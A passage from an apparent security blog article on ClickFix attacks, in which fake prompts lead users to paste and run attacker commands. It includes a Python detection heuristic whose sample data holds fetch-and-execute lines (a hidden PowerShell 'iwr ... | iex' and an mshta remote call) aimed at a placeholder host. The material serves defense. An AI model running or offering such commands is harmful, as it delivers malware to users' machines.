It can start with something as mundane as dragging a link into your browser. Three seconds later, a threat actor has the tokens needed to take over your Microsoft 365 account, and you never did anything that traditional security awareness training would flag. You just followed what looked like a normal set of instructions.
That's the defining characteristic of modern cybercrime: it doesn't force its way in. It steps quietly into the middle of an everyday workflow and turns a routine action into the moment everything goes wrong.
Why These Attacks Keep Working
These attacks work because of habits we've all built up online: clicking through CAPTCHAs, accepting cookie prompts, pressing a key combination to move a process along. That trained reflex is exactly what attackers are counting on.
It's the core mechanic behind ClickFix attacks. Victims are shown a fake prompt instructing them to press a sequence of keyboard shortcuts, which pastes and executes attacker-supplied commands on their own machine. There’s no vulnerability to exploit and no firewall confrontation. Just a convincing lie inserted at the right moment.
ClickFix surged in 2025 and remains active, but attackers have already evolved the concept into something more sophisticated.
Figure 1 below shows the ClickFix-style fake verification prompt.
Figure 1: In a ClickFix attack, the victim follows fake verification steps that ultimately trigger malicious code on their own machine.
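One way a defender could triage pasted commands for the ClickFix pattern described above, for example command strings taken from process-creation logs. This is an added example, not code from the original article or from Huntress; the indicator list, the three-hit threshold, and the sample command lines are constructed assumptions.

```python
import re

# Heuristic indicators, assumed for illustration (not a vendor rule set).
INDICATORS = {
    # A script host or interpreter is what actually runs the pasted text.
    "script_host": re.compile(
        r"\b(?:powershell|pwsh|mshta|cmd|wscript|cscript)(?:\.exe)?\b", re.I),
    # The command pulls content from a remote location.
    "remote_fetch": re.compile(
        r"https?://|\b(?:iwr|irm|curl|invoke-webrequest|invoke-restmethod)\b", re.I),
    # The window is hidden or the payload is passed encoded.
    "hidden_or_encoded": re.compile(
        r"\s-(?:w|windowstyle)\s+h(?:idden)?\b|\s-(?:enc|encodedcommand)\b", re.I),
    # Reassuring text appended so the paste reads like a verification step.
    "decoy_text": re.compile(r"not a robot|captcha|verif(?:y|ication)|human", re.I),
}

def triage(command: str) -> dict:
    """Return which indicators a command string hits and whether to flag it."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(command))
    # Assumed threshold: a script host plus at least two other traits.
    flagged = "script_host" in hits and len(hits) >= 3
    return {"command": command, "hits": hits, "flagged": flagged}

# Constructed sample input: three benign entries, two lure-style entries.
SAMPLES = [
    r"\\fileserver\share\reports",
    "cmd",
    "powershell -NoProfile -File C:\\Scripts\\inventory.ps1",
    'powershell -w hidden -c "iwr https://example.invalid/a | iex" '
    "# I am not a robot: Verification ID 4821",
    "mshta https://example.invalid/check.hta # CAPTCHA verification",
]

def review(samples=SAMPLES):
    """Return only the entries that cross the flagging threshold."""
    return [r for r in map(triage, samples) if r["flagged"]]

if __name__ == "__main__":
    for r in review():
        print(r["hits"], r["command"][:60])
```

The decoy-text indicator is the one most specific to this lure style: a legitimate administrative command rarely carries a trailing "verification" comment.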
A New Attack Variant Targeting Microsoft 365 Sessions